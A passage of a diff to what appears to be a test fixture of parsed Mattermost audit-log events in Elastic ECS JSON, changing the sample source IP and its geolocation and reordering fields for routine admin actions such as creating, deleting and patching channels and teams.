Z\",\"event\":\"restoreChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "restoreChannel", "category": [ @@ -1331,6 +1369,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1343,9 +1385,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:02:31.485Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { 
@@ -1362,52 +1419,36 @@ ] }, "api_path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert", - "session": { - "id": "mbz8h4gkxp8g3yzanizcpg43dc" - } - } - }, - "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" - } - }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:02:31.485Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "session": { + "id": "mbz8h4gkxp8g3yzanizcpg43dc" + } + } + }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209574037Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:31.485 Z\",\"event\":\"convertChannelToPrivate\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543298812Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:31.485 Z\",\"event\":\"convertChannelToPrivate\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "convertChannelToPrivate", "category": [ @@ -1429,6 +1470,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1441,9 +1486,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:02:56.786Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { 
@@ -1467,45 +1527,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:02:56.786Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209585637Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:56.786 Z\",\"event\":\"removeChannelMember\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"P\"},\"remove_user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543300307Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:56.786 
Z\",\"event\":\"removeChannelMember\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"P\"},\"remove_user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "removeChannelMember", "category": [ @@ -1522,6 +1566,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1534,9 +1582,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:03:01.043Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -1550,45 +1613,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/config", - "original": "/api/v4/config" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:03:01.043Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209591224Z", - "original": "{\"timestamp\":\"2021-12-05 00:03:01.043 Z\",\"event\":\"getConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543301659Z", + "original": "{\"timestamp\":\"2021-12-05 00:03:01.043 Z\",\"event\":\"getConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "getConfig", "category": [ 
@@ -1603,6 +1650,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/config", + "original": "/api/v4/config" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1615,9 +1666,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:03:13.849Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { 
@@ -1641,45 +1707,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels", - "original": "/api/v4/channels" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:03:13.849Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209596718Z", - "original": "{\"timestamp\":\"2021-12-05 00:03:13.849 Z\",\"event\":\"createChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels\",\"channel\":{\"id\":\"j3g9ysx6q3nh3q5kiyh3wrugha\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543303008Z", + "original": "{\"timestamp\":\"2021-12-05 00:03:13.849 
Z\",\"event\":\"createChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels\",\"channel\":{\"id\":\"j3g9ysx6q3nh3q5kiyh3wrugha\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "createChannel", "category": [ @@ -1693,6 +1743,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels", + "original": "/api/v4/channels" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1705,9 +1759,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:04:01.294Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { 
@@ -1731,45 +1800,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha", - "original": "/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:04:01.294Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209604404Z", - "original": "{\"timestamp\":\"2021-12-05 00:04:01.294 Z\",\"event\":\"deleteChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha\",\"channeld\":{\"id\":\"j3g9ysx6q3nh3q5kiyh3wrugha\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543304384Z", + "original": "{\"timestamp\":\"2021-12-05 00:04:01.294 
Z\",\"event\":\"deleteChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha\",\"channeld\":{\"id\":\"j3g9ysx6q3nh3q5kiyh3wrugha\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "deleteChannel", "category": [ @@ -1783,6 +1836,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha", + "original": "/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1795,9 +1852,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:12:11.211Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -1811,45 +1883,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/config", - "original": "/api/v4/config" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:12:11.211Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209609882Z", - "original": "{\"timestamp\":\"2021-12-05 00:12:11.211 Z\",\"event\":\"getConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543305780Z", + "original": "{\"timestamp\":\"2021-12-05 00:12:11.211 Z\",\"event\":\"getConfig\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/config\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "getConfig", "category": [ 
@@ -1864,6 +1920,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/config", + "original": "/api/v4/config" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1876,7 +1936,10 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "mattermost": { @@ -1907,22 +1970,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch", 
@@ -1940,12 +2006,12 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-12-08T15:26:55.209615329Z", - "original": "{\"timestamp\":\"2021-12-05 00:12:23.085 Z\",\"event\":\"patchTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch\",\"patched\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543307161Z", + "original": "{\"timestamp\":\"2021-12-05 00:12:23.085 Z\",\"event\":\"patchTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch\",\"patched\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchTeam", "category": [ 
@@ -2007,22 +2073,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch", 
@@ -2040,12 +2109,12 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-12-08T15:26:55.209620519Z", - "original": "{\"timestamp\":\"2021-12-05 00:12:29.655 Z\",\"event\":\"patchTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch\",\"patched\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543308528Z", + "original": "{\"timestamp\":\"2021-12-05 00:12:29.655 Z\",\"event\":\"patchTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch\",\"patched\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchTeam", "category": [ 
@@ -2102,22 +2171,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "url": { "path": "/api/v4/teams", 
@@ -2135,12 +2207,12 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "event": { - "ingested": "2021-12-08T15:26:55.209626076Z", - "original": "{\"timestamp\":\"2021-12-05 00:12:46.044 Z\",\"event\":\"createTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams\",\"team\":{\"id\":\"dqpybz1o3pbuzf7876u834nura\",\"name\":\"another-team\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543310073Z", + "original": "{\"timestamp\":\"2021-12-05 00:12:46.044 Z\",\"event\":\"createTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams\",\"team\":{\"id\":\"dqpybz1o3pbuzf7876u834nura\",\"name\":\"another-team\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "createTeam", "category": [ @@ -2174,6 +2246,18 @@ } }, { + "@timestamp": "2021-12-05T00:18:13.183Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
